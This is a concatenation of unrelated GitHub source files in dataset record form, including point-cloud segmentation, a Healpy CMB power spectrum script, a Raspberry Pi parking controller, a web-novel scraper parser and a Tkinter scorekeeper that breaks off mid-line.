histogram\n #This parameter works fairly well on different point clouds\n v = np.percentile(aux, 0.2, interpolation = 'lower')\n #seed selection\n seed = np.where(aux == v)\n i = int(seed[0][0])\n j = int(seed[1][0]) \n \n #Region to fill with ground\n region = np.zeros((Lx, Ly), dtype=bool)\n \n #Seed lists: current and already-visited\n Q = []\n Q_mem = []\n #memorize the seeds that have already been used\n #to avoid using them again\n\n Q.append(j*Lx + i)\n Q_mem.append(seed)\n\n\n \n while len(Q) > 0:\n #extract the seed\n p_ind = Q.pop()\n \n i = p_ind % Lx\n j = p_ind // Lx\n \n P2 = im[i, j]\n region[i, j] += 1\n #Characteristics of the seed\n #Deal with limit condition problems when extracting neighborhood\n #Source: Gabriel Peyre NL-means patch-wise denoising - Numerical tours for Python\n [X,Y] = np.meshgrid(np.arange(i-r,i + r+1),np.arange(j-r,j + r +1))\n X[X < 0] = 1-X[X < 0] \n Y[Y < 0] = 1-Y[Y < 0]\n X[X >= Lx] = 2*Lx-X[X >= Lx]-1\n Y[Y >= Ly] = 2*Ly-Y[Y >= Ly]-1\n \n \n P1 = im[X, Y]\n #Neighborhood selection\n \n crit1 = region_criterion(P1, P2, C1)\n #Elevation 
difference criterion\n \n region[X*crit1, Y*crit1] = region[i, j]\n #update the region\n \n #potential new seeds \n crit2 = np.zeros((2*r + 1, 2*r + 1), dtype = bool)\n crit2[r, 0] = True\n crit2[0, r] = True\n crit2[2*r, r]= True\n crit2[r, 2*r] = True\n\n #new seeds selection\n new_seeds = X[crit2*crit1] + Y[crit2*crit1]*Lx\n new_seeds = new_seeds.tolist()\n seeds = [x for x in new_seeds if x not in Q_mem]\n #check they have not been used yet\n Q_mem+=seeds\n Q+=seeds\n #print(len(Q))\n #add relevant new seeds to the seed bank\n return region\n \n \ndef make_image(elevation_image, original_shape, im_type = 0):\n '''Build elevation images from elevation projection of the point cloud.\n input: elevation_image [array of images] output of get_elevation, or subpart of it\n original_shape [array of images] full output of get_elevation\n im_type: \n -0: maximal elevation image\n -1: minimal elevation image\n -2: elevation range image\n -3: accumulation image\n -4, 5, 6... image made of the supplementary information of the point cloud (labels, classes)\n output: image from the output of get_elevation function\n mask marking the non-zero pixels in this image, for reverse projection\n '''\n #original shape is needed because the image needs to respect the dimension of the whole point\n #cloud projection to be transferable to other operations with other images\n \n #image basis\n MINS = np.min(original_shape[:, 0:2], axis = 0)\n L_X, L_Y = np.max(original_shape[:, 0:2], axis = 0) - MINS \n im = np.zeros((int(L_X+1.), int(L_Y+1.)))\n #mask to locate the points that have been updated\n #important for reverse projection\n mask = np.zeros(im.shape).astype(bool)\n im_type = int(im_type + 2) #which elevation image to build\n\n \n for i in range(elevation_image.shape[0]):\n x, y = int(elevation_image[i, 0]-MINS[0]), int(elevation_image[i, 1]-MINS[1])\n\n im[x, y] = elevation_image[i, im_type]\n mask[x, y] = True\n \n return im, mask\n\ndef make_binary(im_in, thresh, dtyp = 'int'):\n #Binarize an image given a threshold thresh. Output type can be specified\n im = np.copy(im_in)\n im[im <= thresh] = False\n im[im > thresh] = True\n if dtyp == 'int':\n return im.astype(int)\n else: \n return im.astype('bool')\n \ndef image_to_2Dcloud(im, elevation_mask):\n #reverse projection: from image to list of index. 
Backward operation of \"make image\"\n im = im.reshape(-1, order = 'C')\n elevation_mask = elevation_mask.reshape(-1, order = 'C')\n \n mount_cloud = im[elevation_mask]\n \n \n return mount_cloud\n \n \ndef conv_2D_3D(mount_cloud, ground, reverse_proj, points):\n #backward operation of \"get elevation\"\n \n a, b, c = zip(*reverse_proj)\n N = np.max(mount_cloud)\n N = int(N)\n u = np.linspace(0, N, N + 1)\n np.random.shuffle(u)\n is_obj = np.zeros(points.shape[0])\n for i in range(len(mount_cloud)):\n ind = a[i]\n is_obj[ind] = u[mount_cloud[i]]\n if ground[i] == 1 and mount_cloud[i] != 0:\n potential_ground = c[i]\n #print(np.min(np.abs(points[potential_ground, 2]-zmin-ground_dilate[i])))\n #print(ground_dilate[i])\n #potential_ground = potential_ground[np.abs(points[potential_ground, 2]-zmin-ground_dilate[i]) > 0.4]\n #if potential_ground.shape[0]>0:\n # print(potential_ground)\n is_obj[potential_ground] = u[0]\n #print(u[0])\n\n return is_obj","repo_name":"Alienor134/City-segmentation-3D","sub_path":"segmentation_func.py","file_name":"segmentation_func.py","file_ext":"py","file_size_in_byte":9634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33222720387","text":"def fromuser():\n f = open(\"quotes.txt\",\"a+\")\n print(\"Number of quotes you wish to enter: \")\n k = input()\n k1 = int(k)\n f.write(\"\\n\")\n for i in range(k1):\n print(\"Kindly enter quote number %d: \" % (i+1))\n user = input()\n f.write(\"%s\\n\" % user)\n f.close()\n print(\"\\n\")\n #Ask whether to print the new file\n print(\"Do you wish to see the updated file?\\nEnter Y for Yes and N for No :\")\n o = input()\n if o == \"Y\":\n print(\"\\n\")\n f = open(\"quotes.txt\",\"r\")\n quotes = f.readline()\n while (quotes):\n print(quotes)\n quotes = f.readline()\n f.close()\nif __name__ == \"__main__\":\n fromuser()\n\n \n \n\n","repo_name":"huzbadri53/python-random-quote","sub_path":"in-quote.py","file_name":"in-quote.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39022295914","text":"from localpdb import PDB\nimport toml\n\nfrom functions.files import write_json\nfrom functions.pdb import load_pdb_lists\nfrom rich.console import Console\n\n\nconsole = Console()\n\n\nconfig = toml.load('config.toml')\n\nclass_i = load_pdb_lists('class_i', config['WAREHOUSE_PATH'], console)\n\n\nlpdb = PDB(db_path=config['LOCALPDB_PATH'])\n\nalpha_fold_sets = {}\n\nalpha_fold_date_cutoff = 20180430\nalpha_fold_resolution_cutoff = 8\n\npdb_after_cutoff = lpdb.entries.query(f'deposition_date >= {alpha_fold_date_cutoff} & resolution <= 8')\npdb_before_cutoff = lpdb.entries.query(f'deposition_date < {alpha_fold_date_cutoff} & resolution <= 8')\n\nprint (len(pdb_after_cutoff))\nprint (len(pdb_before_cutoff))\n\nmhc_after_cutoff = [pdb_code for pdb_code in pdb_after_cutoff.index if pdb_code in class_i]\nmhc_before_cutoff = [pdb_code for pdb_code in pdb_before_cutoff.index if pdb_code in class_i]\n\nprint (len(class_i))\n\nprint (len(mhc_after_cutoff))\nprint (len(mhc_before_cutoff))\n\n\n\n\n\nall_under_8 = set(mhc_after_cutoff) | set(mhc_before_cutoff)\n\nprint (len(all_under_8))\n\nexcluded = set(class_i) - all_under_8\n\nprint (len(excluded))\n\nprint (excluded)\n\nalpha_fold_sets['before_date_cutoff'] = mhc_before_cutoff\nalpha_fold_sets['after_date_cutoff'] = mhc_after_cutoff\nalpha_fold_sets['over_8_angstroms'] = [pdb_code for pdb_code in excluded]\n\nprint 
(alpha_fold_sets)\n\n\nfilepath = f'{config[\"CONSTANTS\"]}/alpha_fold_sets.json'\nwrite_json(filepath, alpha_fold_sets, verbose=True, pretty=True)\n\n","repo_name":"histofyi/original-pipeline","sub_path":"steps/split_into_alpha_fold_sets.py","file_name":"split_into_alpha_fold_sets.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32197811738","text":"import cv2\r\nimport numpy as np\r\n\r\ndef draw_circle(event,x,y,flags,param):\r\n \r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n cv2.circle(img,(x,y),100,(0,255,0),-1)\r\n \r\n if event == cv2.EVENT_RBUTTONDOWN:\r\n \r\n cv2.circle(img,(x,y),100,(0,0,255),-1)\r\n \r\n if event == cv2.EVENT_MBUTTONDOWN:\r\n cv2.circle(img,(x,y),100,(255,255,255),-1) \r\n \r\ncv2.namedWindow(winname='drawing')\r\n\r\ncv2.setMouseCallback('drawing',draw_circle)\r\n\r\n# uint8 is the dtype cv2.imshow expects for 0-255 colour values\r\nimg = np.zeros((512,512,3), np.uint8)\r\n\r\nwhile True: \r\n cv2.imshow('drawing',img)\r\n \r\n if cv2.waitKey(20) & 0xFF == 27:\r\n break\r\n \r\ncv2.destroyAllWindows()","repo_name":"ShaunMoloi/Images_Numpy","sub_path":"Shape.py","file_name":"Shape.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71292894954","text":"from os import getenv\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom dotenv import load_dotenv\nfrom flask import g\n\nload_dotenv()\n\n#connect to database using env variable\nengine = create_engine(getenv('DB_URL'), echo=True, pool_size=20, max_overflow=0)\n#handles the connection to the db\nSession = sessionmaker(bind=engine)\n#generates temporary connections for performing create, read, update, and delete operations\nBase = declarative_base()\n#helps map the models to real mysql tables\n\ndef init_db(app):\n Base.metadata.create_all(engine)\n app.teardown_appcontext(close_db)\n\n\n#the function saves the current connection on the g object if it is not already there,\n# then it returns the connection from the g object instead of creating a new session\ndef get_db():\n if 'db' not in g:\n #store db connection in app context\n g.db = Session()\n \n return g.db\n\ndef close_db(e=None):\n db = g.pop('db', None)\n\n if db is not None:\n db.close()","repo_name":"eburger939/python-newsfeed","sub_path":"app/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42933959323","text":"# Billing systems\r\n\r\n#PF-Assgn-23\r\ndef calculate_bill_amount(gems_list, price_list, reqd_gems, reqd_quantity):\r\n bill_amount = 0\r\n\r\n for gem, quantity in zip(reqd_gems, reqd_quantity):\r\n #the bill is invalid if any required gem is not sold in the store\r\n if gem not in gems_list:\r\n return -1\r\n #price_list has one-to-one correspondence with gems_list\r\n bill_amount += quantity * price_list[gems_list.index(gem)]\r\n\r\n #a 5% discount applies once the total reaches 30000\r\n if bill_amount >= 30000:\r\n bill_amount -= (5/100)*bill_amount\r\n\r\n return bill_amount\r\n\r\n#List of gems available in the store\r\ngems_list=['Amber', 'Aquamarine', 'Opal', 'Topaz']\r\n\r\n#Price of gems available in the store. gems_list and price_list have one-to-one correspondence\r\nprice_list=[4316, 1342, 8734, 6421]\r\n\r\n#List of gems required by the customer\r\nreqd_gems=['Amber', 'Topaz']\r\n\r\n#Quantity of gems required by the customer. reqd_gems and reqd_quantity have one-to-one correspondence\r\nreqd_quantity=[1, 4]\r\n\r\nbill_amount=calculate_bill_amount(gems_list, price_list, reqd_gems, reqd_quantity)\r\nprint(bill_amount)","repo_name":"mathankrish/Infy-Programs","sub_path":"InfyTq Basic Programming/Day3/Day3Ass23.py","file_name":"Day3Ass23.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29744827454","text":"#from gpiozero import Buzzer\nimport RPi.GPIO as GPIO\nimport time\nimport socket\nimport threading\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nport=4971\nconnect=True\ns.connect(('192.168.0.10',port))\nclientRunning=True\n\nButton1=10 #empty parking lot\nLED=16 #LED\nline_button=8 #warning system\nwarningsign=7 #piezo buzzer\nflap=32 #flap->servo motor\ntrig=11 #sensor\necho=12 #sensor\ntollbar= 15 # tollbar\n\nempty={'1':'Button1','2':'Button2','3':'Button3'} #empty parking lot list\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\n\n\nGPIO.setup(warningsign,GPIO.OUT)\nGPIO.setup(Button1,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(line_button,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(LED,GPIO.OUT)\nGPIO.setup(flap,GPIO.OUT)\nGPIO.setup(tollbar,GPIO.OUT)\nGPIO.setup(trig, GPIO.OUT)\nGPIO.setup(echo,GPIO.IN)\n\n\np1=GPIO.PWM(flap,50)\np2=GPIO.PWM(tollbar,50)\nbutton_press=GPIO.input(Button1)\n\n\n\n#pressure detect #presscount%2==0 in&out #presscount%2==1 in \n\ndef press(s):\n presscount=0\n while True:\n count=0\n GPIO.output(LED,True)\n if GPIO.input(Button1)==GPIO.HIGH:\n presscount+=1\n print('ready for parking')\n time.sleep(1)\n while GPIO.input(Button1)==GPIO.LOW:\n GPIO.output(LED,False) #turn off LED\n if presscount%2==1:\n count+=1\n time.sleep(1)\n print(count)\n if count>=5:\n print(\"no.1 is full\")\n \n \n #activate flap\n\n \n p1.start(12.5)\n p1.ChangeDutyCycle(7.5)\n time.sleep(1)\n #p1.ChangeDutyCycle(7.5)\n msg = '1'\n if msg=='1':\n s.send(bytes(msg,'utf-8'))\n #count=0\n #presscount=0\n \n\n break\n \n else:\n break\n'''\ndef press(s): \n presscount=0\n while True:\n count=0\n GPIO.output(LED, True)\n if GPIO.input(Button1)==GPIO.HIGH: #button pressed\n print(\"ready for parking\")\n presscount+=1\n time.sleep(1)\n while GPIO.input(Button1)==GPIO.LOW: #After button pressed\n if presscount%2==1:\n count+=1\n time.sleep(1)\n print(count)\n if count>=3 : #button pressed--->not pressed----->10sec----->parked\n print(\"no.1 is full\")\n del empty['1'] #delete from empty parking lot list\n GPIO.output(LED,False) #turn off LED\n p1.start(7.5)\n p1.ChangeDutyCycle(7.5) #activate flap\n time.sleep(1)\n p1.ChangeDutyCycle(12.5)\n msg = '1'\n s.send(bytes(msg,'utf-8'))\n presscount=0 \n break\n \n #if button1 interrupt,count again from 0\n else:\n break\n #if money paid sign income-> p.start(12.5) /p.ChangeDutyCycle(12.5)/p.ChangeDutyCycle(7.5)\n #empty[i]='button i'\n''' \ndef warning():\n while True:\n if 
GPIO.input(line_button)==GPIO.HIGH:#if button pressed\n print(\" buzzer activate\")\n while GPIO.input(line_button)==GPIO.HIGH: #while button pressed activate buzzer\n GPIO.output(warningsign,0)\n time.sleep(.2) \n GPIO.output(warningsign,1)\n time.sleep(.2)\n\ndef Entrance():\n while True:\n count=0\n #caculate distance\n GPIO.output(trig,False)\n time.sleep(0.5)\n\n GPIO.output(trig,True)\n time.sleep(0.00001)\n GPIO.output(trig,False)\n\n while GPIO.input(echo)==0:\n pulse_start=time.time()\n\n while GPIO.input(echo)==1:\n pulse_end=time.time()\n\n pulse_duration= pulse_end - pulse_start\n distance=pulse_duration *17000\n distance=round(distance,2)\n \n \n # if distance<10 activate survo motor (toll bar)\n if int(distance)<10:\n p2.start(7.5)\n #activate flap\n \n p2.ChangeDutyCycle(12.5)\n for i in range(5):\n \n time.sleep(1)\n \n p2.ChangeDutyCycle(7.5)\n\n\ndef reset(s):\n msg = 0\n while clientRunning:\n msg=s.recv(1024)\n msg = str(msg,'utf-8')\n print(msg)\n if msg=='1': #msg recv\n GPIO.output(LED,True) #turn on LED\n \n p1.start(7.5) # flap reset\n p1.ChangeDutyCycle(12.5)\n \n \n #if money paid sign income-> p.start(12.5) /p.ChangeDutyCycle(12.5)/p.ChangeDutyCycle(7.5)\n #empty[i]='button i'\n ###### cleanup nonreservation system\n \n\n#press() warning() Entrance() reset(s)\ndef main():\n threading.Thread(target=reset, args=(s,)).start()\n threading.Thread(target=press,args=(s,)).start()\n threading.Thread(target=warning).start()\n threading.Thread(target=Entrance).start() \n\nmain()\n","repo_name":"hyorard/parkTowerProject","sub_path":"press.py","file_name":"press.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11136047773","text":"from quixote_utils import RootDirectory\nfrom quixote.form.form import Form\nfrom quixote.form.widget import *\nfrom bookdb import Book, BookDatabase\n\nclass DBInterface(RootDirectory):\n _q_exports = [\"\", \"show\", \"add_book\", \"edit_book\"]\n def __init__(self, db):\n super(DBInterface, self).__init__()\n self.db = db\n self.currentbook = self.db.get_book(\"000000\")\n def _q_index(self):\n return \"\"\"Welcome to our online library!
\n Please go to our
    show page.\"\"\"\n def show(self):\n return \"list of books\"\n def edit_book(self):\n \"\"\n form = Form()\n for field in Book.FIELDS:\n form.add(StringWidget, field, title=field,\n value=getattr(self.currentbook, field))\n form.add(SubmitWidget, \"submit\")\n if not form.is_submitted():\n return form.render()\n else:\n self.db.edit_book(self.currentbook.dbkey,\n *[form[field] for field in Book.FIELDS])\n self.db.commit()\n return \"The book has been edited!\"\n \n def add_book(self):\n form = Form()\n for field in Book.FIELDS:\n form.add(StringWidget, field, title=field)\n form.add(SubmitWidget, \"submit\")\n if not form.is_submitted():\n return form.render()\n else:\n self.db.add_book(*[form[field] for field in Book.FIELDS])\n self.db.commit()\n return \"A new book has been added!\"\n \n def add_from_text_file(self):\n return \"Please choose the book file.\"\n\n\nroot = DBInterface(BookDatabase(\"books\"))\nroot.publish_show(\"edit_book\", browser=\"mozilla\")\n","repo_name":"micheles/papers","sub_path":"pypers/bolzano/db/BooksOnline.py","file_name":"BooksOnline.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"7603883997","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 5 17:09:55 2017\n\n@author: camila\n\n -- Aula 9 --\n\n\"\"\"\n#%%\n\"\"\"\nSTEP 1: Import the packages\n\"\"\"\n\nimport healpy as hp\nimport matplotlib\nfrom matplotlib import pyplot # ***\nimport numpy as np\n\n# The following comands allow us to define the size of the characteres \n# at the mollview visualization.\nfontsize = 20\nmatplotlib.rcParams.update({'font.size':fontsize})\n\n#%%\n\"\"\"\nSTEP 2: Spherical harmonic transforms: map --> Cls\n\"\"\"\n###################################\n# Calculating Cls from a CMB map:::\n\n# Just for temperature:::\nmapa = hp.read_map('COM_CMB_IQU-smica_1024_R2.02_full.fits')\n\nCls_TT = hp.anafast(mapa)\n\n# For temperature and polarization:::\nmapa = hp.read_map('COM_CMB_IQU-smica_1024_R2.02_full.fits', field=[0,1,2])\n\nCls = hp.anafast(mapa)\n\nCls_TT = Cls[0]\nCls_EE = Cls[1]\nCls_BB = Cls[2]\nCls_TE = Cls[3]\nCls_EB = Cls[4]\nCls_TB = Cls[5]\n\n\n#########\n# Plot:::\n\n# TT:::\nlmax = len(Cls_TT)\nell = np.arange(lmax)\n\nDls_TT = ell*(ell+1)*Cls_TT/(2.*np.pi)\n\npyplot.plot(ell, Dls_TT,linewidth=2.0, color=\"red\") #label=\"CMB Cls\"\n#\n#plt.ylim(-300.,1000.)\n#pyplot.xscale('log')\npyplot.title('Calculated Angular Power Spectrum - TT',fontsize=20)\npyplot.xlabel('Multipole, $\\ell$',fontsize=20)\npyplot.ylabel('$[\\ell(\\ell + 1)/2\\pi] C_\\ell^{TT}$ $[K^2]$',fontsize=20)\n#pyplot.legend(loc='best')\n#\nfig = pyplot.gcf()\nfig.set_size_inches(10, 6)\npyplot.savefig(\"Cls.png\")\npyplot.show()\n\n#-----\nres = hp.nside2resol(1024, arcmin = True)\nprint('Resolution=', res, 'arcmin')\n\ntheta = (180./lmax)*60.\nprint('Theta=', theta, 'arcmin')\n#-----\n\n# EE:::\n\npyplot.plot(ell, Cls_EE,linewidth=2.0, color=\"red\") # label=\"CMB Cls\"\n#\npyplot.title('Calculated Angular Power Spectrum - EE',fontsize=20)\npyplot.xlabel('Multipole, $\\ell$',fontsize=20)\npyplot.ylabel('$C_\\ell^{EE}$ $[K^2]$',fontsize=20) # ($\\mu K^2$)')\npyplot.legend(loc='best')\n\nfig = pyplot.gcf()\nfig.set_size_inches(10, 6)\npyplot.savefig(\"Cls_EE.png\")\npyplot.show()\n\n\n# BB:::\n# TE:::\n\nDls_TE = ell*(ell+1)*Cls_TE/(2.*np.pi)\n\npyplot.plot(ell, Dls_TE,linewidth=2.0, color=\"red\") # label=\"CMB Cls\"\n#\npyplot.title('Calculated Angular Power 
Spectrum - TE',fontsize=20)\npyplot.xlabel('Multipole, $\\ell$',fontsize=20)\npyplot.ylabel('$[\\ell(\\ell + 1)/2\\pi] C_\\ell^{TE}$ $[K^2]$',fontsize=20) # ($\\mu K^2$)')\npyplot.legend(loc='best')\n\nfig = pyplot.gcf()\nfig.set_size_inches(10, 6)\npyplot.savefig(\"Cls_TE.png\")\npyplot.show()\n\n\n# EB:::\n# TB:::\n\n#%%\n\"\"\"\nSTEP 3: Spherical harmonic transforms: Cls --> fits file (writing the Cls in a fits file)\n\"\"\"\n# For one Cls array:\nhp.write_cl('calc_Cls.fits', Cls[0])\n\n# For all:\nhp.write_cl('calc_Cls.fits', Cls)\n\n\n#%%\n\"\"\"\nSTEP 4: Spherical harmonic transforms: fits file --> Cls (reading Cls from a fits file)\n\"\"\"\n# To open just the FIRST extension:\nCls2 = hp.read_cl('COM_PowerSpect_CMB_R2.02.fits', h=True) #h=True or False does not work.\n\n\n# To access the header and choose the extension you want to open:\nfrom astropy.io import fits\nhdulist = fits.open('COM_PowerSpect_CMB_R2.02.fits')\nhdulist.info()\n\nCls_TTLOLUNB = hp.read_cl(hdulist[1])\nCls_TTHILUNB = hp.read_cl(hdulist[8])\n\nn1 = len(Cls_TTLOLUNB[0])\nn2 = len(Cls_TTHILUNB[0])\nn = n1 + n2\n\nell=np.zeros(n)\nDls=np.zeros(n)\n\nell[0:n1] = Cls_TTLOLUNB[0]\nell[n1:n] = Cls_TTHILUNB[0]\nDls[0:n1] = Cls_TTLOLUNB[1]\nDls[n1:n] = Cls_TTHILUNB[1]\n\npyplot.plot(ell, Dls,linewidth=2.0, color=\"red\") \npyplot.title('Angular Power Spectrum',fontsize=20)\npyplot.xlabel('Multipole, $\\ell$',fontsize=20)\npyplot.ylabel('$[\\ell(\\ell + 1)/2\\pi] C_\\ell^{TT}$ $[\\mu K^2]$',fontsize=20) # ($\\mu K^2$)')\nfig = pyplot.gcf()\nfig.set_size_inches(10, 6)\npyplot.savefig(\"Cls_TT2.png\")\npyplot.show()\n","repo_name":"cpnovaes/Healpy-Classes","sub_path":"HealpyCodes/aula9.py","file_name":"aula9.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22169965174","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Feb 12 20:50:00 2022\r\n\r\n@author: R.U.S.T.E.A.M\r\n\"\"\"\r\n\r\nn = int(input())\r\na = []\r\nfor i in range(n):\r\n x = int(input())\r\n k = bin(x).count('1')\r\n a.append(k)\r\nfor i in a:\r\n print(i)","repo_name":"rustamabdukakhorov/Robocontest","sub_path":"051.py","file_name":"051.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"40604906395","text":"# coding:utf8\n# HTML parser\nfrom bs4 import BeautifulSoup\nimport re\nimport urllib.parse\nclass HtmlParser(object):\n\n\n def _get_new_url(self, page_url, soup, is_full):\n links = soup.find_all('a', href=re.compile(r'-chapter-'))\n if len(links) == 0:\n print('Match failed')\n return\n new_urls = set()\n for link in links:\n new_url = link['href']\n if is_full:\n new_url = urllib.parse.urljoin(page_url, new_url)\n new_urls.add(new_url)\n return new_urls\n\n def _get_new_data(self, page_url, soup):\n res_data = {}\n res_data['url'] = page_url\n #https://hellotranslations.wordpress.com/2015/01/30/dou-po-cang-qiong-chapter-1/\n # find() returns a single tag, so get_text() can be called on it\n title = soup.find('div', class_='collapseomatic_content')\n res_data['title'] = title.get_text()\n summary_node = soup.find('div', itemprop='articleBody').find_all('p')\n if len(summary_node) > 2:\n summary_node = summary_node[1].get_text()\n res_data['summary'] = summary_node\n\n return res_data\n\n\n def parse(self, page_url, html_cont, is_full):\n if page_url is None or html_cont is None:\n return\n soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')\n new_urls = 
self._get_new_url(page_url, soup, is_full)\n new_data = self._get_new_data(page_url, soup)\n return new_urls, new_data","repo_name":"DSPerson/pa","sub_path":"baike_spider/html_parser.py","file_name":"html_parser.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31147243001","text":"\"\"\" Given the following program and input, what is printed:\r\nCana\r\nSan\r\nSan\r\nPlata\r\nDomingo\r\n\"\"\"\r\n\r\ndef main():\r\n infile = open(\"infile.txt\", \"r\")\r\n for line in infile:\r\n index = line.find(\" \")\r\n if line.find(\"de\") > -1:\r\n print( line[:index] )\r\n else:\r\n print( line[index+1:], end=\"\" )\r\nmain()\r\r\n","repo_name":"Reikenzan/Some-Python","sub_path":"SomeWork/Fall2013/Q_6.py","file_name":"Q_6.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11437943777","text":"#import the modules\nfrom tkinter import * #get tkinter, used to make the GUI\nimport os.path #get os.path, used to get images\nimport PIL.Image, PIL.ImageTk #get pil, used to get images\nimport time #get time, used in animation\n\n#define the root window\nroot = Tk() #make the window\nroot.title(\"Scorekeeper\") #Title the window\n\n#create 2 stringvars for the two scores\nscore1 = StringVar() #create a varible for player 1 score\nscore1.set('0.0') #initiate it\n\nscore2 = StringVar() #create a variable for player 2 score\nscore2.set('0.0') #initiate it\n\n#create stringvar for winning score\nwinningScore = StringVar() #create a variable for winning score\nwinningScore.set('999999999999999') #initiate it impossibly high\n\n#define 4 functions which can add, subtract the 2 scores based on button presses\ndef add1(): #define the function\n number = float(score1.get()) #get the existing score\n newNumber = number + 1 #add 1\n score1.set(str(newNumber)) #set the variable to the new score\n answer.set(newNumber) #change the display to show the new score\n compare = float(winningScore.get()) #get the winning score so you can compare\n if newNumber == compare:#check if the users score is the winning score\n button1.config(state='disabled') #disable buttons\n button2.config(state='disabled') #disable buttons\n button3.config(state='disabled') #disable buttons\n button4.config(state='disabled') #disable buttons\n for x in range(0, 210): #animate the text\n canvas2.move(2, 1, 0) #move the text\n root.update() #update to show the new text position\n time.sleep(0.01) #wait a bit to make it look like it is moving\n trophy() #call the function that makes the trophy come on\n \ndef sub1(): #define function\n number = float(score1.get()) #get existing score\n newNumber = number - 1 #subtract 1\n score1.set(str(newNumber)) #set the variable to the new score\n answer.set(newNumber) #change the display to the new score\n compare = float(winningScore.get()) #get the winning score so they can be compared\n if newNumber == compare:#check if the score is the winning score\n button1.config(state='disabled') #disable buttons\n button2.config(state='disabled') #disable buttons\n button3.config(state='disabled') #disable buttons\n button4.config(state='disabled') #disable buttons\n for x in range(0, 210): #animate the text\n canvas2.move(2, 1, 0) #move it\n root.update() #show\n time.sleep(0.01) #wait a bit\n trophy() #animate the trophy\n\ndef add2(): #define function\n number = float(score2.get()) #get existing score\n 
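# (editor's note, hypothetical refactor) add1/sub1/add2/sub2 repeat one pattern;\n    # a single change_score(score_var, display_var, delta) helper could replace them\n    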
newNumber = number + 1 #add 1\n    score2.set(str(newNumber)) #change the variable\n    answer2.set(newNumber)# change the display\n    compare = float(winningScore.get()) #get the winning score\n    if newNumber == compare: #see if the score is the winning score\n        button1.config(state='disabled') #disable buttons\n        button2.config(state='disabled') #disable buttons\n        button3.config(state='disabled') #disable buttons\n        button4.config(state='disabled') #disable buttons\n        for x in range(0, 210): #animate text\n            canvas2.move(3, 1, 0) #move text on\n            root.update() #show it\n            time.sleep(0.01) #wait a bit\n        trophy() #animate trophy\n\ndef sub2(): #define function\n    number = float(score2.get()) #get existing score\n    newNumber = number - 1 #subtract 1\n    score2.set(str(newNumber)) #set the variable\n    answer2.set(newNumber) #change the display\n    compare = float(winningScore.get()) #compare the two\n    if newNumber == compare: #if the score is the winning score\n        button1.config(state='disabled') #disable buttons\n        button2.config(state='disabled') #disable buttons\n        button3.config(state='disabled') #disable buttons\n        button4.config(state='disabled') #disable buttons\n        for x in range(0, 210): #animate text\n            canvas2.move(3, 1, 0) #move text on\n            root.update() #show it\n            time.sleep(0.01) #wait a bit\n        trophy() #animate trophy\n\n#function to set the winning score\ndef setscore(): #define function\n    number = entrybox.get() #get the input\n    winningScore.set(str(number)) #set the variable\n    entrybox.config(state='disabled') #disable entrybox\n\n#create the title canvas\ncanvas = Canvas(root, background='white', height=100) #make canvas for the title\ncanvas.grid(row=0, column=0, columnspan=5) #position it\n\n#create the animation canvas \ncanvas2 = Canvas(root, height = 200, width=287, background='white') #make canvas\ncanvas2.grid(row=7, column=1, columnspan=5) #position it\n\n#define the 4 buttons to control increasing and decreasing score\nbutton1 = Button(text=\"+\", command=add1, activebackground='green') #create button\nbutton1.grid(row=5,column=1) #position it\n\nbutton2 = Button(text=\"-\", command=sub1) #create button\nbutton2.grid(row=5,column=2) #position it\n\nbutton3 = Button(text=\"+\", command=add2) #create button\nbutton3.grid(row=5,column=3) #position it\n\nbutton4 = Button(text=\"-\", command=sub2) #create button\nbutton4.grid(row=5,column=4) #position it\n\n#define 2 variables which are bound to the labels holding the score\nanswer = StringVar() #create it for player 1\nanswer2 = StringVar() #create it for player 2\n\n#create 2 text boxes to hold the 2 scores being displayed\ntext = Label(root, text='0.0', textvariable=answer)\ntext.grid(row=3, column=1, columnspan=2)\n\ntext2 = Label(root, text='0.0', textvariable=answer2)\ntext2.grid(row=3, column=3, columnspan=2)\n\n#create the form to set a winning score\nentrybox = Entry(root, width=5) #make the entry box\nentrybox.grid(row=6, column=1, columnspan=1) #position it\n\nwinningButton = Button(root, text='Set Winning Score', command=setscore) #make the button\nwinningButton.grid(row=6, column=2, columnspan=3) #position it\n\n# Get a filename in the same directory as this program\ndirectory = os.path.dirname(os.path.abspath(__file__)) #use OS to get path\nfilename = 